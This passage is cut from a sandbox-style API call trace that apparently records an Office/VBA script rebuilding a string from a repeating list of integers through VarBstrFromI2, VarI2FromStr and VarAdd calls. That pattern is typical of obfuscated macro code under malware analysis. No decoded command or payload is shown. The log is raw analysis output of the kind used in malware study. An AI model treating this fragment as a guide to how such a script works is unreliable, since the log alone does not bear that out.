lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.148] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.149] GetUserDefaultLCID () returned 0x409 [0047.149] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.149] GetUserDefaultLCID () returned 0x409 [0047.149] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.150] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.151] GetUserDefaultLCID () returned 0x409 [0047.151] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.151] GetUserDefaultLCID () returned 0x409 [0047.151] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.151] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.152] GetUserDefaultLCID () returned 0x409 [0047.152] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.152] GetUserDefaultLCID () returned 0x409 [0047.152] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.152] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.153] GetUserDefaultLCID () returned 0x409 [0047.153] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.154] GetUserDefaultLCID () returned 0x409 [0047.154] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.154] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.155] GetUserDefaultLCID () returned 0x409 [0047.155] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.155] GetUserDefaultLCID () returned 0x409 [0047.155] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.155] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.155] VarAdd (in: pvarLeft=0x80f6a28, pvarRight=0x80f69a8, pvarResult=0x80f6990 | out: pvarResult=0x80f6990) returned 0x0 [0047.157] GetUserDefaultLCID () returned 0x409 [0047.157] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01ۇ") returned 0x0 [0047.157] GetUserDefaultLCID () returned 0x409 [0047.157] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.158] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.159] GetUserDefaultLCID () returned 0x409 [0047.159] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.159] GetUserDefaultLCID () returned 0x409 [0047.159] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.159] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.160] GetUserDefaultLCID () returned 0x409 [0047.160] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.160] GetUserDefaultLCID () returned 0x409 [0047.161] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.161] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.162] GetUserDefaultLCID () returned 0x409 [0047.162] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.162] GetUserDefaultLCID () returned 0x409 [0047.162] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.162] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.163] GetUserDefaultLCID () returned 0x409 [0047.163] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.163] GetUserDefaultLCID () returned 0x409 [0047.163] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.163] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.164] GetUserDefaultLCID () returned 0x409 [0047.164] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.164] GetUserDefaultLCID () returned 0x409 [0047.164] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.165] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.166] GetUserDefaultLCID () returned 0x409 [0047.166] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.166] GetUserDefaultLCID () returned 0x409 [0047.166] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.166] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.167] GetUserDefaultLCID () returned 0x409 [0047.167] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.168] GetUserDefaultLCID () returned 0x409 [0047.168] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.168] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.169] GetUserDefaultLCID () returned 0x409 [0047.169] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.169] GetUserDefaultLCID () returned 0x409 [0047.169] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.169] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.170] GetUserDefaultLCID () returned 0x409 [0047.170] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.170] GetUserDefaultLCID () returned 0x409 [0047.170] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.171] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.171] GetUserDefaultLCID () returned 0x409 [0047.172] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.172] GetUserDefaultLCID () returned 0x409 [0047.172] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.172] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.173] GetUserDefaultLCID () returned 0x409 [0047.173] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.173] GetUserDefaultLCID () returned 0x409 [0047.173] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.173] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.174] GetUserDefaultLCID () returned 0x409 [0047.174] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.174] GetUserDefaultLCID () returned 0x409 [0047.174] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.174] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.175] GetUserDefaultLCID () returned 0x409 [0047.175] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.175] GetUserDefaultLCID () returned 0x409 [0047.175] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.175] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.176] GetUserDefaultLCID () returned 0x409 [0047.176] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.176] GetUserDefaultLCID () returned 0x409 [0047.177] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.177] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.178] GetUserDefaultLCID () returned 0x409 [0047.178] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.178] GetUserDefaultLCID () returned 0x409 [0047.178] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.178] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.179] GetUserDefaultLCID () returned 0x409 [0047.179] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.179] GetUserDefaultLCID () returned 0x409 [0047.179] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.179] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.180] GetUserDefaultLCID () returned 0x409 [0047.180] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.180] GetUserDefaultLCID () returned 0x409 [0047.180] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.180] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.181] GetUserDefaultLCID () returned 0x409 [0047.181] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.181] GetUserDefaultLCID () returned 0x409 [0047.181] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.182] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.183] GetUserDefaultLCID () returned 0x409 [0047.183] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.183] GetUserDefaultLCID () returned 0x409 [0047.183] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.183] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.184] GetUserDefaultLCID () returned 0x409 [0047.184] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.184] GetUserDefaultLCID () returned 0x409 [0047.184] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.185] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.186] GetUserDefaultLCID () returned 0x409 [0047.186] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.186] GetUserDefaultLCID () returned 0x409 [0047.186] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.186] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.187] GetUserDefaultLCID () returned 0x409 [0047.187] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.187] GetUserDefaultLCID () returned 0x409 [0047.187] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.187] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.188] GetUserDefaultLCID () returned 0x409 [0047.188] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.189] GetUserDefaultLCID () returned 0x409 [0047.189] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.189] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.190] GetUserDefaultLCID () returned 0x409 [0047.190] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.190] GetUserDefaultLCID () returned 0x409 [0047.190] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.190] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.191] GetUserDefaultLCID () returned 0x409 [0047.191] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.192] GetUserDefaultLCID () returned 0x409 [0047.192] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.192] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.193] GetUserDefaultLCID () returned 0x409 [0047.193] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.193] GetUserDefaultLCID () returned 0x409 [0047.193] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.193] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.194] GetUserDefaultLCID () returned 0x409 [0047.194] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.194] GetUserDefaultLCID () returned 0x409 [0047.194] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.194] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.195] GetUserDefaultLCID () returned 0x409 [0047.195] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.196] GetUserDefaultLCID () returned 0x409 [0047.196] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.196] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.197] GetUserDefaultLCID () returned 0x409 [0047.197] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.197] GetUserDefaultLCID () returned 0x409 [0047.197] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.197] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.198] GetUserDefaultLCID () returned 0x409 [0047.198] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.198] GetUserDefaultLCID () returned 0x409 [0047.198] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.198] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.199] GetUserDefaultLCID () returned 0x409 [0047.199] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.199] GetUserDefaultLCID () returned 0x409 [0047.199] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.199] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.208] GetUserDefaultLCID () returned 0x409 [0047.208] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.208] GetUserDefaultLCID () returned 0x409 [0047.208] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.208] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.209] GetUserDefaultLCID () returned 0x409 [0047.209] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.209] GetUserDefaultLCID () returned 0x409 [0047.209] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.209] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.210] GetUserDefaultLCID () returned 0x409 [0047.210] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.210] GetUserDefaultLCID () returned 0x409 [0047.210] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.210] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.211] GetUserDefaultLCID () returned 0x409 [0047.211] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.211] GetUserDefaultLCID () returned 0x409 [0047.211] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.212] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.212] GetUserDefaultLCID () returned 0x409 [0047.213] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.213] GetUserDefaultLCID () returned 0x409 [0047.213] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.213] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.214] GetUserDefaultLCID () returned 0x409 [0047.214] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.214] GetUserDefaultLCID () returned 0x409 [0047.214] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.214] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.215] GetUserDefaultLCID () returned 0x409 [0047.215] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.215] GetUserDefaultLCID () returned 0x409 [0047.215] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.215] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.216] GetUserDefaultLCID () returned 0x409 [0047.216] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.216] GetUserDefaultLCID () returned 0x409 [0047.217] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.217] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.218] GetUserDefaultLCID () returned 0x409 [0047.218] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.218] GetUserDefaultLCID () returned 0x409 [0047.218] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.218] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.219] GetUserDefaultLCID () returned 0x409 [0047.219] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.219] GetUserDefaultLCID () returned 0x409 [0047.219] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.219] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.220] GetUserDefaultLCID () returned 0x409 [0047.220] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.220] GetUserDefaultLCID () returned 0x409 [0047.220] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.220] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.221] GetUserDefaultLCID () returned 0x409 [0047.221] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.222] GetUserDefaultLCID () returned 0x409 [0047.222] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.222] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.223] GetUserDefaultLCID () returned 0x409 [0047.223] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.223] GetUserDefaultLCID () returned 0x409 [0047.223] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.223] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.224] GetUserDefaultLCID () returned 0x409 [0047.224] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.224] GetUserDefaultLCID () returned 0x409 [0047.224] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.224] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.225] GetUserDefaultLCID () returned 0x409 [0047.225] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.225] GetUserDefaultLCID () returned 0x409 [0047.225] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.225] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.227] GetUserDefaultLCID () returned 0x409 [0047.227] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.227] GetUserDefaultLCID () returned 0x409 [0047.227] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.227] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.228] GetUserDefaultLCID () returned 0x409 [0047.228] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.228] GetUserDefaultLCID () returned 0x409 [0047.228] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.228] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.229] GetUserDefaultLCID () returned 0x409 [0047.230] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.230] GetUserDefaultLCID () returned 0x409 [0047.230] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.230] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.231] GetUserDefaultLCID () returned 0x409 [0047.231] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.232] GetUserDefaultLCID () returned 0x409 [0047.232] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 